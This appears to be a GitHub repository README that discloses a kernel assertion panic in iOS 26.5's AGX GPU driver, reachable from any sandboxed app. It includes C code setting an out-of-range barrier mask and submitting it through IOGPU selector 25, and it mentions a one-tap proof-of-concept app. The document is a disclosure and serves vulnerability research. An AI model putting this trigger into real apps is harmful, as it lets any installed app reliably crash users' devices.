Skip to content

zeroxjf/AGXBarrierPanic

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
poc
poc
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
panic-full-2026-05-10-151511.0002.ips
panic-full-2026-05-10-151511.0002.ips
 
 

Repository files navigation

AGX Barrier-Mask Panic

Device: iPhone 17 Pro (iPhone18,1)
OS: iOS 26.5 RC 2 (23F77) — XNU 25.5.0 xnu-12377.122.4~1
Class: Reachable kernel assertion
Apple response: Not a security vulnerability

Bug

AGXCommandBuffer::generateMTLBarriers (agxk_command_buffer.cpp:996) fires a kernel panic assertion when it encounters an out-of-range barrier stage mask. The mask comes directly from a user-supplied kind-2 command stream submitted via IOGPUDeviceUserClient selector 25 (SubmitCommandBuffers). The parser does not reject the invalid mask before generateMTLBarriers sees it.

panic(cpu 0 caller 0xfffffe004887d6e4): AGXk:
agxk_command_buffer.cpp:996:void AGXCommandBuffer::generateMTLBarriers(uint32_t, uint32_t):
!!! Incorrect barrier stage information for CommandBuffer 0xfefffe197e1a6800
fStateIndex 1 src_mask 1024 dst_mask 0

src_mask 1024 is 0x400. The valid mask presumably covers bits 0–9; bit 10 (0x400) is not a recognized stage and triggers the assertion instead of a clean rejection.

Trigger path

Any sandboxed app can reach this. No entitlements beyond a normal installed app.

// Set barrier_src_mask = 0x400 in both the outer record and kind-2 inline payload
StoreU32(command, kAGXSecondParserRecordOffset + kAGXOuterBarrierSrcMaskRecordOffset, 0x400);
StoreU32(command, kAGXKind2InlineOffset + kAGXKind2BarrierSrcMaskInlineOffset, 0x400);
StoreU32(command, kAGXKind2InlineOffset + kAGXOptionalResource0InlineOffset, 0xffffffff);
StoreU32(command, kAGXKind2InlineOffset + kAGXOptionalResource1InlineOffset, 0xffffffff);
StoreU32(command, kAGXKind2InlineOffset + kAGXOptionalResource2InlineOffset, 0xffffffff);

// selector 25: SubmitCommandBuffers
uint64_t submitScalars[] = {queueID, 0, 1, kAGXCommandBufferArgSize};
IOConnectCallMethod(connection, kIOGPUSelectorSubmitCommandBuffers,
                    submitScalars, 4,
                    submitArg, sizeof(submitArg),
                    &submitStatus, &submitStatusCount,
                    NULL, NULL);
// kernel panics before this returns

PoC

poc/ is an iOS Xcode project. Build for a physical device running iOS 26.5, install, and tap Trigger AGX Barrier. The device will panic within a second.

panic-full-2026-05-10-151511.0002.ips is the captured panic log from the test device.

Notes

The bug is a missing bounds check, not a memory-safety issue. The kernel asserts rather than corrupting memory, which is why Apple closed it as not a security vulnerability. The assertion is nonetheless reachable from an unprivileged sandbox, so any app can reliably crash the device.

The kernel extension in the backtrace is com.apple.iokit.IOGPUFamily 130.14.

About

AGXCommandBuffer::generateMTLBarriers reachable kernel assertion via out-of-range barrier mask — iOS 26.5 (23F77)

Resources

Readme
Activity

Stars

9 stars

Watchers

0 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages